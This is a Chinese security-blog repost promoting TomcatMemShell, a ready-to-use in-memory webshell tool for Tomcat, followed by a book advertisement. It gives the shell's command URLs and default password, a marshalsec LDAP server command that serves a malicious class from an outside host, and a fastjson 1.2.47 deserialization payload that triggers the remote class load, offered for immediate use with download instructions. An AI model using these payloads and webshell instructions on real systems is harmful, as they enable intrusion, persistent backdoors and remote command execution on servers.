拿来即用的内存马 -- TomcatMemShell

admin 2022年5月8日13:40:42评论151 views字数 1144阅读3分48秒阅读模式

项目作者:ce-automne

项目地址:https://github.com/ce-automne/TomcatMemShell


一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。


二、使用方法

1、Listener型/Filter型:

CMD内存马URL:xx.xx.xx.xx/?chan=whoami冰蝎内存马URL:xx.xx.xx.xx/     默认连接密码:goautomne

2、Servlet型:

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码:goautomne


三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",        "autoCommit":true    }}


四、下载地址

1、通过项目地址下载

2、公众号后台回复:20220508


好书推荐


拿来即用的内存马 -- TomcatMemShell

本书既有理论研究,又有实践探讨,共分为6章,讲解了云计算安全中人工智能与大数据挖掘技术的应用实践。第1章从概念、发展、标准等角度宏观地介绍了云计算安全;第2章从云计算安全需求的角度阐释云计算安全的核心目标、公有云场景下的安全需求和私有云场景下的安全需求;第3章全面、系统地介绍了公有云安全技术体系和私有云安全技术体系;第4章详细介绍了人工智能技术在云计算安全领域的应用实践;第5章详细介绍了大数据挖掘技术在云计算安全领域的应用实践;第6章介绍了人工智能和大数据挖掘技术的综合应用,提出云数据中心安全防护框架,并详细介绍了云数据中心安全态势感知系统。本书是人工智能与大数据挖掘技术在云计算安全领域的应用实践参考书,适用于人工智能、大数据挖掘、云计算、网络信息安全相关领域的从业人员。

原文始发于微信公众号(web安全工具库):拿来即用的内存马 -- TomcatMemShell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月8日13:40:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   拿来即用的内存马 -- TomcatMemShellhttps://cn-sec.com/archives/985793.html

发表评论

匿名网友 填写信息